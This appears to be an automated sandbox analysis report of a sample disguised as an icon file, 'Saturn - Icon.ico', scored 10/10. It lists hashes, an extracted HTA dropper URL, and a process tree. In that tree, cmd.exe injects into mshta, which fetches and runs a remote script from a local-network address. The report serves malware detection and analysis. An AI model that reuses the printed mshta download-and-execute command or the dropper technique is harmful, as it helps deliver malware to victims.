Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
96s -
max time network
84s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
03/04/2023, 21:30
Static task
static1
Behavioral task
behavioral1
Sample
Saturn - Icon.ico
Resource
win7-20230220-en
2 signatures
150 seconds
General
-
Target
Saturn - Icon.ico
-
Size
4KB
-
MD5
aea4e29119b6b140a2ba9d99c0c78316
-
SHA1
348486ce37c69c5204af0362e19dfd5691b5a817
-
SHA256
2051fdcc57536ef32572aaacf924fec46ebe8d43a09199e4e8230f489a959e0b
-
SHA512
d73eb2ea0c6eaacb1b909ef8b208641ef407a1326dbeeb1ffac4ffd2249c5cb1cc3de392cbc13989303938c7aa027649988d649a2b493a5cc7a47b1fe546f359
-
SSDEEP
24:subEH6uR+5CnVbsFCc/4a7ESvXbXmHQ90wP3smyUmzgioeTMhatD6q+xiz:dEDRGCVbsFC5a7EM6wrP8NUMRTNz
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
http://192.168.0.5:3847/t4XVD
Signatures
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1840 wrote to memory of 1520 1840 cmd.exe 30 PID 1840 wrote to memory of 1520 1840 cmd.exe 30 PID 1840 wrote to memory of 1520 1840 cmd.exe 30
Processes
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen "C:\Users\Admin\AppData\Local\Temp\Saturn - Icon.ico"1⤵PID:1540
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\system32\mshta.exemshta http://192.168.0.5:3847/t4XVD2⤵
- Modifies Internet Explorer settings
PID:1520
-